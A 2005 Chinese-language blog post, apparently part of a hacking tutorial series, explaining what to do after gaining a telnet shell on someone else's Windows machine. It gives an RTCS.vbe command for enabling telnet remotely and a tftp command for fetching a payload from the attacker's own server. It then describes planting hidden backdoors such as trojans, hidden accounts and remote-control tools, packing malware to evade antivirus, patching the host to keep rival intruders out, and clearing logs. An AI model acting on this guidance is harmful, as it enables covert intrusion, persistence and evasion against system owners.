cscript RTCS.vbe targetIP username password NTLMAuthor telnetport
cscript RTCS.vbe <目标IP> <管理员用户名> <密码> <验证方式> <tlnet端口>

 
那telnet上去后不知道该做什么了?很多朋友这样问了,我想如果你是从第1天看的,应该知道吧,我就再说说吧
1 查看系统信息
呵呵,其实就是随处看看,看看他的系统配置和版本(用type c:\boot.ini来知道pro版或server版),看看都装了什么服务或软件(从目录名就可以知道了),看看有什么重要或有趣的文件啦(唉,要是国外的机器,看也看不懂),看看他的用户情况,总之就是尽可能多的了解系统,为一会装后门摸底。
2 使用tftp传送文件
想必大家都遇到过在telnet中传输文件的问题,因为我们习惯了在ipc管道中的文件传输,所以有些朋友喜欢用net share ipc$ 来打开管道,进而利用copy来传输文件。不过这样反而麻烦,既然我们已经得到了shell(这个前面已经很详细的说过了)们可以用TFPT命令来完成这一切,什么是TFTP呢?
用TFTP(Trivial File Transfer Protocol)来实现文件的传送是一种基于UDP连接的文件传输,一般是使用Windows自带的tftp.exe和一个TFTP服务器端软件构成一个完整的传输结构。它是这样使用的: 首先运行本地的TFTP Server(比如tftpd32.exe)软件并保证始终开启直至传输全部完成, 然后在telnet中(当然你也可以在其他shell中)运行下面的命令:
C:\>tftp –i ip get xinxin.exe c:\abc\xinxin.exe
其中ip为你自己机器的ip,且上传文件要与TFTP服务器端在同一目录下,这样你就可以把xinxin.exe上传到c盘abc目录下了(其实是从tftp服务器下载来的)

需要指出的是,如果使用代理IP,你将不能实现与外部网络的文件传送。因为你的代理网关在进行数据封装的时候会将自己的IP地址加入到你的数据报中,代替你的内部网络地址,所以在外部网络进行MAC寻址时是找不到你这台TFTP服务器的。
3 安置后门
如果你入侵还有其他目的,比如以破坏为主,或者是来修改主页的,那么这些事情当然可以在安置后门之前做;如果你只是想得到一只肉鸡,那就没什么可说的了,安后门吧
这个问题我在前面有讲过一点,但不详细.用的后门一般有:木马,asp木马,远程控制软件,克隆帐户,建立并隐藏帐户,telnet,telnet扩展的shell,终端服务等。安置一个好的后门通常要注意以下几点:(这是一个前辈写的我copy一下,很中肯的)
1 不会被防火墙查杀及阻碍通信:被加入病毒库的后门最好加壳以逃过防火墙,尽量用低端口通信,以免被防火墙屏蔽。
2 最大限度增加隐蔽性:如果你选择远程控制软件,要注意被控端的安装提示和小图标,以及是否同步画面;如果你在帐户上做文章,要尽量保持在cmd和用户管理中都不出破绽;如果你选择放木马或telnet扩展,要注意文件和进程的隐藏;如果新开了终端服务(入侵前并没有开),一定要该掉3389这个显眼的端口,且越低越好。
不要当管理员不存在:这是一个大忌,许多朋友在只有默认帐户的机器上建立类似'hacking'的管理员帐户,真是无知者无畏呀。所以安置后门的时候,想想管理员疏忽的地方会在哪里。
4 打补丁
如果想独霸肉鸡,就要会打补丁,要知道对肉鸡的竞争是很激烈的。怎么打补丁呢?这个也要问?想想你是怎么进来的吧。算了,提示一下,除了修补大的漏洞以外(上传官方补丁并运行),也要注意它的共享,ipc$共享(最好都关闭),疑端口,容易被利用的服务等。不过打补丁也要注意隐蔽性的,不要让管理员发现大的改动。
5 清除日志
可以手动或利用软件,如果不太会就去找相关教材吧,在这里我不详细介绍了

- 作者: hikaru 2005年07月12日, 星期二 02:24  回复(0) |  引用(0) 加入博采